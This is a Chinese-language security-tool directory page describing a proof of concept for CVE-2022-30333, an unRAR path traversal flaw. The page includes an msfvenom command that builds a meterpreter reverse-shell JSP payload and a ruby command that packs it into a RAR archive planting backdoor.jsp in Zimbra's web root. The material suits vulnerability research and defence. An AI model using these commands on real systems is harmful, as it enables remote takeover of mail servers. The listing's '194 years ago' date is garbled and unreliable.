Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-30333 — 生成恶意 RAR 压缩包,利用 unRAR 中的路径遍历漏洞将文件植入任意位置,并通过 Zimbra 后门进行演示。 | Kitploit
工具/GitHubGitHub/rakhithjk/cve-2022-30333
漏洞利用框架Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubrakhithjk/cve-2022-30333

CVE-2022-30333

生成恶意 RAR 压缩包,利用 unRAR 中的路径遍历漏洞将文件植入任意位置,并通过 Zimbra 后门进行演示。

查看仓库
194年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-30333 的概念验证——unRAR 6.11 之前版本中的一个路径遍历漏洞。我创建这个工具是为了在 AttackerKB 的分析文章中演示该漏洞,并希望尽快将其整合到 Metasploit 模块中!

基本上,你提供一个目标路径(包含路径遍历)和一些文件数据,这个工具会生成一个 .rar 文件,解压时会将文件提取到指定位置。最大文件长度为 104 字节,文件内容最大为 4096 字节。(这不是漏洞本身的限制,只是我生成文件时选择的数值)。

例如,使用 msfvenom 生成一个后门:

$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp

然后创建一个 .rar 文件,将 .jsp 文件放置在某个有趣的位置:

$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar
下载工具